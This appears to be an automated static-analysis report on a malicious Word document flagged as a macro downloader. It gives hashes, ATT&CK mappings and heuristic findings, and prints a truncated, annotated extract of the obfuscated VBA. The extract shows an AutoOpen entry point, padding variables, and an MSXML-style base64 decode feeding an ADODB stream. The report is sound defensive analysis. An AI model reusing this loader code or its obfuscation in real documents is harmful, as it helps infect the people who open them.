Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d3a7e7ea90ba8dc…

MALICIOUS

Office (OLE)

161.5 KB Created: 2017-05-04 16:42:00 Authoring application: Microsoft Office Word First seen: 2017-05-13
MD5: 3a8552d676e08703f8201a52889f8802 SHA-1: d4719b7a118eb757ce7214b926d4507a9319fbaf SHA-256: 7d3a7e7ea90ba8dc0fe9761ac4fa5e7017373fe8f0c0b8bfc7e3c70e9c98f98c
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and uses CreateObject and Shell() calls, indicating an attempt to execute arbitrary code. This is consistent with a downloader or dropper malware designed to fetch and run a second-stage payload. The ClamAV detection also confirms its malicious nature.

Heuristics 8

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; on its own it does not attribute the sample to a downloader or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16550 bytes
SHA-256: 4fd19edf82cb3e8f53731aa76dff233e2465e8035a47721d55b1b6cca475da5b
Preview script
First 1,000 lines of the extracted script
' Module attribute header for the "ThisDocument" class module, as emitted by
' the VBA source extraction. These Attribute lines are compiler metadata, not
' executable statements; no procedures appear under this module in the
' extracted source, so the macro logic is entirely in Module1 and Module2.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' Module1: the macro's entry point. Word runs a procedure named AutoOpen when
' the document is opened (the OLE_VBA_AUTOOPEN finding above), so this body
' executes with no further user action once macros are enabled.
Sub AutoOpen()

' The Dim/assignment pairs below use random names and are never read again
' inside this Sub; they appear to be padding rather than program logic.
Dim DXKcs As Byte
DXKcs = 223
Dim drxoT As Boolean
drxoT = False
Dim OzQdX As Byte
OzQdX = 132
Dim aCNED As Single
aCNED = Val(38096.700924199)
Dim KJvn6eqr
' iTisf98 is not declared anywhere in the visible listing and the result is
' discarded, so this line is padding as well.
KJvn6eqr = LCase(iTisf98)
' >> The only statement with an effect: a bare identifier in VBA is a
' procedure call. ao3CG7eT is not defined in the visible part of the listing
' (it is truncated below), so the operative logic lives in the unseen portion
' of macros.bas — confirm there before describing what this macro does.
ao3CG7eT
End Sub

Attribute VB_Name = "Module2"
' gAuRQ(I0b5iIS): takes a string argument, pushes it through a COM object's
' typed-element conversion, and returns whatever qRdoV makes of the resulting
' nodeTypedValue (qRdoV is defined below; its definition is cut off in this
' listing). As in Module1, most lines are never-read padding variables; only
' the statements marked ' >> contribute to the result.
'
' Observed chain: CreateObject(oBJxv) -> .CreateElement(IVcEO2l6) ->
' .DataType = "bin." & IVcEO2l6 -> .Text = I0b5iIS -> .nodeTypedValue.
' oBJxv and IVcEO2l6 are not declared in the visible source.
' NOTE(review): if oBJxv resolves to an MSXML DOMDocument ProgID and IVcEO2l6
' to "base64", this is the well-known MSXML "bin.base64" element decode used
' to turn an embedded text blob into bytes — confirm from the unseen
' definitions before the report asserts the encoding.
Public Function gAuRQ(ByVal I0b5iIS)
Dim mUoTIw As Double
mUoTIw = Val(32502.763272077)
Dim VBtmLa0 As Single
VBtmLa0 = Sgn(14353.053151931)
Dim zl9eX
Dim u8D4ZvPAa

Dim jiQw48gav As Long
jiQw48gav = -2003272256
Dim bJqpnUBax
' cQOTBfn is undeclared in the visible source; result unused (padding).
bJqpnUBax = Len(cQOTBfn)

Dim JnfPY As Integer
JnfPY = 10733
Dim kge5LvCN As Long
kge5LvCN = Sgn(-479446318)
' >> Instantiate a COM object whose ProgID comes from the undeclared oBJxv.
Set zl9eX = CreateObject(oBJxv)

Dim qoLpzi As Integer
qoLpzi = -22503
Dim zQTRiou As Byte
zQTRiou = 111
Dim Vi71TFm9 As Single
Vi71TFm9 = 19600.033381308
' >> Create a child element; the tag name is the same undeclared IVcEO2l6 that
' is reused as the DataType suffix below.
Set u8D4ZvPAa = zl9eX.CreateElement(IVcEO2l6)
Dim FQDFZlkh As Double
FQDFZlkh = Sgn(61160.349166364)
Dim vJvytm As Single
vJvytm = Int(18487.402532009)
Dim mB0xkD4 As Single
mB0xkD4 = 36055.464712362
' >> The With block does not use the .member shorthand; it repeats the object
' name, so the With itself is cosmetic.
With u8D4ZvPAa
Dim ZcQs8TqW As Integer
ZcQs8TqW = Sgn(30624)
Dim qciD6d As Boolean
qciD6d = True
' >> Typed-value conversion: "bin." & <suffix> selects how .Text is decoded.
u8D4ZvPAa.DataType = "bin." & IVcEO2l6
Dim NT9Wf4V As Long
NT9Wf4V = Sgn(-459281258)
Dim JI1jn4urU As Boolean
JI1jn4urU = False
' >> The caller-supplied string is the encoded input.
u8D4ZvPAa.Text = I0b5iIS
End With
Dim OHPeCAso As Single
OHPeCAso = Sgn(16163.419619824)
Dim JIy8CgA As Single
JIy8CgA = Int(56208.815364551)
Dim YMNiz
' UXuMyt8Ob is undeclared in the visible source; result unused (padding).
YMNiz = Val(UXuMyt8Ob)
Dim hiGZQ7pj As Byte
hiGZQ7pj = 242
Dim sS2dpc1Te As Long
sS2dpc1Te = 0
' >> Return value: the decoded bytes (.nodeTypedValue) post-processed by
' qRdoV, which the truncated listing shows writing them into an
' "adodb.stream" object.
gAuRQ = qRdoV(u8D4ZvPAa.nodeTypedValue)
Dim qvrWaQ As Integer
qvrWaQ = Sgn(10387)
Dim Kef2D9B As Long
Kef2D9B = Sgn(0)
Dim Yp6gXziR As Single
Yp6gXziR = 29579.491087246
' >> Release both COM references.
Set u8D4ZvPAa = Nothing
Set zl9eX = Nothing
End Function
Function qRdoV(Binary)
Dim RtDxhTcs As Integer
RtDxhTcs = Sgn(-14625)
Dim zZ3HxTO As Double
zZ3HxTO = Int(6285.1011814613)
Const Bvg2N = 2
Const kBF8v = 1
Dim b7ODQ3 As Integer
b7ODQ3 = Sgn(17197)
Dim UdlwjH As String
UdlwjH = AscB("E")
Dim CmcfyFl As Single
CmcfyFl = 43735.14494797
Dim sVA8f
Dim H0bwSm As Single
H0bwSm = Round(55704.681716492)
Dim fmRDx
fmRDx = Val("m")
Dim GxZv19s As Long
GxZv19s = -1876602424
Dim Xt5AZekB As Double
Xt5AZekB = Sgn(20667.044930352)
Dim RshtZxF As String
RshtZxF = AscB("J")
Dim OxV0kCT As Long
OxV0kCT = 0
Set sVA8f = CreateObject("adodb.stream")
Dim PfT8Mb5 As Integer
PfT8Mb5 = Sgn(-9952)
Dim o8FXdlj3 As Integer
o8FXdlj3 = Sgn(-13948)
Dim Be0n5bPrS As String
Be0n5bPrS = Val("8")
With sVA8f

Dim jgOnlQVpJ As Boolean
jgOnlQVpJ = True
Dim cgheW As Byte
cgheW = 133
Dim i2Ef90XiW As Single
i2Ef90XiW = 54552.535355803
.Type = kBF8v
Dim B3Sn7gcm As Single
B3Sn7gcm = Sgn(37415.222443235)
Dim khP0CbiVI As Boolean
khP0CbiVI = True
Dim AB6gF As Single
AB6gF = Fix(47611.159975582)
Dim vfDUEAl
vfDUEAl = Trim(lfFO8uIM)
Dim y6xnfP9 As Single
y6xnfP9 = Sgn(8801.0150691247)
.Open
Dim z9CSzL
z9CSzL = Len(ZngbJQ62I)
Dim ZArsw4Fk0 As Byte
ZArsw4Fk0 = 250
Dim pu3bv As Integer
pu3bv = Sgn(-15340)
Dim ucCYVoD
ucCYVoD = Len(rOZ1ugmlD)
Dim L0doNbw56 As Boolean
L0doNbw56 = True
.Write Binary
Dim BwY6zlp
BwY6zlp = Val("h")
Dim u7dov25
u7dov25 = Val(Pevcm)
.Position = 0

Dim EtNkVjuYb As Byte
EtNkVjuYb = 157
Dim tvHqDX As String
tvHqDX = AscW("F")
Dim aSoObc As Boolean
aSoObc = True
.Type = Bvg2N

Dim pvNUy As Byte
pvNUy = 131
Dim p1vU5ZxrT As Byte
p1vU5ZxrT = 199
Dim cFb4MNtEx
cFb4MNtEx = "2"
Dim pw1ZXkxtz As Single
pw1ZXkxtz = Sgn(30880.240866816)
Dim Gye8v5sjJ
Gye8v5sjJ = Len(bmGPOM)

Dim u2j6hO5 As Boolean
u2j6hO5 = True
Dim xU6KDP As Single
xU6KDP = Sgn(17094.792335229)
.CharSet = "ascii"

Dim p2pKoJzPL As Long
p2pKoJzPL = 0
Dim CYMhtXVj1 As Long
CYMhtXVj1 = Sgn(0)
Dim e2Ko3mv As Boolean
e2Ko3mv = True
Dim suvhY42p As S
... (truncated)